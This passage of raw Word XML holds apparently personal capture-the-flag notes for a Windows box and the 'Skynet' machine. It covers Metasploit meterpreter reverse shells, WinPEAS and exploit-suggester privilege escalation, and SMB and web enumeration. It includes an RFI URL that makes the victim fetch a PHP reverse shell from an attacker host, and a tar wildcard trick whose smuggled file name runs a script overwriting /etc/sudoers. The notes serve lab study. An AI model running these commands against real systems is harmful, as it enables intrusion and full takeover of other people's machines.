        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set payload windows/meterpeter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6519714E" w14:textId="4EBDDF86" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set lhost &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65350260" w14:textId="7F9724FC" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set lport &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6472DF8A" w14:textId="63888107" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CACE66" w14:textId="24674DA2" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shell command in listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4507D0A4" w14:textId="7D6C0516" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340C1C26" w14:textId="13410D08" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>WinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419DABF8" w14:textId="28B4E529" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Start smbserver on attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC80CF8" w14:textId="05F9ADF5" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>smbserver.py smbfolder .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56934AAC" w14:textId="4794B452" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>From victim machine copy to obtain library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED68DC6" w14:textId="635AE57D" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">c:\tmp&gt;copy </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00A254B0" w:rsidRPr="00DB3027">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\&lt;ip&gt;\smbfolder\winPEAS.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79013037" w14:textId="34E69626" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run winPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1B1017" w14:textId="2E290D06" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Interesting Binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E56FA6" w14:textId="189DA580" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Running Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E4C9A9" w14:textId="35BB3386" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>replace programs with shell program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B478D0" w14:textId="0E7F5889" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467445D4" w14:textId="5578E969" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>systeminfo command in shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9F568F" w14:textId="5CA1EF28" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy output and put into text file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B60B3E9" w14:textId="0B183BA1" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>put txt file in windows-exploit-suggester folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB45878" w14:textId="05D7482D" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run exploit suggester to check for any vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF89B66" w14:textId="10C238C9" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A254B0">
        <w:t>./windows-exploit-suggester.py –database &lt;DB-NAME&gt; –systeminfo systeminfo(or whatever you called you txt file) -l(to search only for local exploits).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06092016" w14:textId="231B2B7E" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. ./windows-exploit-suggester.py - -database 2019-08-11-</w:t>
      </w:r>
      <w:r w:rsidR="0011412C">
        <w:t>mssh.xls - -systeminfo systeminfo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64605657" w14:textId="49CE50CA" w:rsidR="0011412C" w:rsidRDefault="0011412C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pick exploit that has Metasploit module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFE3A8A" w14:textId="57A66B0E" w:rsidR="0011412C" w:rsidRDefault="0011412C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use exploit/windows/local/ms16_075_reflection_juicy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2665E02A" w14:textId="408B5036" w:rsidR="0011412C" w:rsidRDefault="0011412C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B910F78" w14:textId="51E9E438" w:rsidR="0011412C" w:rsidRDefault="0011412C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E519D4" w14:textId="45A78E97" w:rsidR="0011412C" w:rsidRDefault="0011412C" w:rsidP="0011412C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B1F4B2" w14:textId="7256AE05" w:rsidR="0011412C" w:rsidRDefault="000F3B32" w:rsidP="0011412C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SKYNET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025EF8DF" w14:textId="7D018213" w:rsidR="000F3B32" w:rsidRDefault="00EF132B" w:rsidP="000F3B32">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE80E03" w14:textId="3E0E8ABB" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EED0E49" w14:textId="5C6D0376" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2AB788" w14:textId="02302AE3" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enum4linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE9F838" w14:textId="06FD8D8B" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482BC1CC" w14:textId="633A4A0A" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E37577F" w14:textId="16390693" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>smbmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BDFBE9" w14:textId="75635073" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python3 smbmap -H &lt;victim IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DAD575" w14:textId="524DF8A3" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>smbclient //&lt;IP&gt;/anonymous (if anonymous login found)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14486BCB" w14:textId="15CCB27F" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>smbclient -U &lt;smb server name&gt;/&lt;username&gt; ‘\\&lt;ip&gt;\&lt;share name&gt;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E8787E" w14:textId="4D55BA0E" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hidden Directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCF77BC" w14:textId="7678837A" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>gobuster sub directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0858CA8C" w14:textId="39F275FB" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A4F5A0" w14:textId="5F687530" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>version research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4564A168" w14:textId="0E33013C" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C31338" w14:textId="4B63D804" w:rsidR="00EF132B" w:rsidRDefault="00EF132B" w:rsidP="00EF132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>searchsploit -m &lt;exploit #&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5062F196" w14:textId="0C6A1484" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RFI Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA1B550" w14:textId="0E26BBDA" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python -m http.server &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0145A6" w14:textId="69049F83" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to host reverse shell file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7168488B" w14:textId="54E8D2DF" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use RFI to pull file into CMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA0D6F" w14:textId="3CC92A57" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00985BD9">
        <w:t>http://&lt;Victim</w:t>
      </w:r>
      <w:r>
        <w:t>_IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00985BD9">
        <w:t>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://&lt;Attacker IP&gt;:&lt;Port&gt;/path/to/php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BEB782" w14:textId="69BE735F" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use NC listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5CF1BB" w14:textId="29E9FD6C" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nc -lvnp &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ABDB26" w14:textId="3782663E" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python -c ‘import pty;pty.spawn(“/bin/bash”)’;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2206BD99" w14:textId="19D0F8E2" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E8C7DA" w14:textId="4041E28C" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>msfconsole &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9CF37F" w14:textId="59B35BCC" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D58045" w14:textId="79912F5B" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2AA32" w14:textId="1CA5E757" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A8AB4E" w14:textId="0898C3D3" w:rsidR="00985BD9" w:rsidRDefault="00985BD9" w:rsidP="00985BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>run post</w:t>
      </w:r>
      <w:r w:rsidR="008E503B">
        <w:t>/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679D27DA" w14:textId="0341CA2A" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>LinPEAS – tar wildcard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADC4D94" w14:textId="6B679553" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/var/www/html (directory being tar’d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C6553F" w14:textId="77777777" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>echo 'echo "www-data ALL=(root) NOPASSWD: ALL" &gt; /etc/sudoers' &gt; privesc.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C10A15" w14:textId="77777777" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>echo "/var/www/html"  &gt; "--checkpoint-action=exec=sh privesc.sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2BF00A" w14:textId="0DF55520" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
